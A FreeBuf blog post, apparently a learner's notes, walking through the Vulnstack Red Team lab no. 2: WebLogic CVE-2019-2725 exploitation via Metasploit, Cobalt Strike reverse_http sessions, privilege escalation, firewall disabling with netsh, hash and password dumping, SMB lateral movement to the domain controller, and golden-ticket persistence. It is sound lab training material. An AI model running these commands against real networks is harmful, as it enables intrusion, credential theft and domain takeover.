freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

Vulnstack红日内网靶场(二)-学习过程笔记
2022-09-29 17:00:24
所属地 安徽省

前言

链接:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/?key=

环境搭建

WEB:192.168.111.80(外)10.10.10.80(内)

PC:192.168.111.201(外)10.10.10.201(内)

DC:10.10.10.10(内)

KALI:192.168.111.128

信息收集

arp-scan -I eth0 -l #扫描同段主机

1664441625_63355d19312afc28fdb9c.png!small?1664441625661

发现目标主机192.168.111.80

nmap扫描开放端口

nmap -sS -v 192.168.111.80

1664441645_63355d2db93fda398c48c.png!small?1664441646744

开放445(smb)、7001(weblogic)

访问7001是weblogic后台页面

尝试可以利用weblogic漏洞

漏洞利用

工具:weblogic扫描器

链接:https://github.com/rabbitmask/WeblogicScan

用法:python weblogic.py -u 192.168.111.80 -p 7001

1664441664_63355d409dec64e8626a6.png!small?1664441665442

利用较新的CVE

MSF查询CVE

search CVE-2019-2725

1664441676_63355d4c191d47ae16219.png!small?1664441678128

1664441680_63355d50d3c16860fc747.png!small?1664441681302

成功上线111.80机器

CS和MSF联动

工具:cobalt strike

创建监听

1664441686_63355d5683d74a2fd6286.png!small?1664441686945

MSF使用模块exploit/windows/local/payload_inject

payload:windows/meterpreter/reverse_http

端口设置需要和CS监听端口一致

1664441698_63355d62877d4ea50e0de.png!small?1664441699027

1664441701_63355d65940bfc150788d.png!small?1664441701816

成功上线

提权

提升为系统权限

新建一个监听,同样使用MSF上线

1664441708_63355d6c04f5dcc94ae9e.png!small?1664441708338

进行提权

1664441735_63355d8731d26ad5125b6.png!small?1664441735507

1664441715_63355d73a53badc2806be.png!small?1664441716073

查看基本信息

shell ipconfig /all

关闭防火墙

shell netsh advfirewall set allprofiles state off

查看存在的域

shell net view /domain

查看域名

shell net config workstation

内端口存活主机扫描

portscan 10.10.10.0/24 445 arp 200

1664441750_63355d96135accd94a641.png!small?1664441750474

发现域10.10.10.10

进行域存活主机扫描

1664441755_63355d9b402a25c64874f.png!small?1664441755973

发现域下两台主机

横向移动

统一目标(列表)

1664441764_63355da4c6f95c67ff0a2.png!small?1664441765048

抓取hash

1664441769_63355da92a7bdd5c7a232.png!small?1664441769446

创建smb监听器,利用smb服务去横向移动

1664441780_63355db44953be5a9aa42.png!small?1664441780550

由于网段不同,需要进行代理转发

利用system权限那台监听器进行代理转发

1664441787_63355dbbcb8d33e68a6f0.png!small?1664441788365

开始横向移动

1664441797_63355dc579b89659cd874.png!small?1664441797786

1664441801_63355dc92c2fdbf830277.png!small?1664441801590

DC上线

同理使用DC横向移动到PC

至此全部主机已上线

1664441809_63355dd16e56e3b7af3ff.png!small?1664441809729

权限维持(黄金票据)

原理:在Kerberos认证中,Client通过AS(身份认证服务)认证后,AS会给Client一个Logon Session Key和TGT,而Logon Session Key并不会保存在KDC中,krbtgt的NTLM Hash又是固定的,所以只要得到krbtgt的NTLM Hash,就可以伪造TGT和Logon Session Key来进入下一步Client与TGS的交互。而已有了金票后,就跳过AS验证,不用验证账户和密码,所以也不担心域管密码修改。

使用场景:当我们拿到这个域内的某个低权限即域内成员的账号权限时候,可以利用制作好的票据进行提权攻击。

在DC会话中hashdump和logonpasswords

1664441818_63355ddab4e23f2b836e3.png!small?1664441819121

拿到krbtgt的hash,再使用低权限账号的SUID制作黄金票据

1664441823_63355ddf9b7e1a7a322fc.png!small?1664441824079

1664441831_63355de749080d56d09bf.png!small?1664441831659

制作完成

至此靶场已全部完成

# 渗透测试 # 网络安全 # 内网渗透 # 渗透测试学习 # 网络安全技术
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录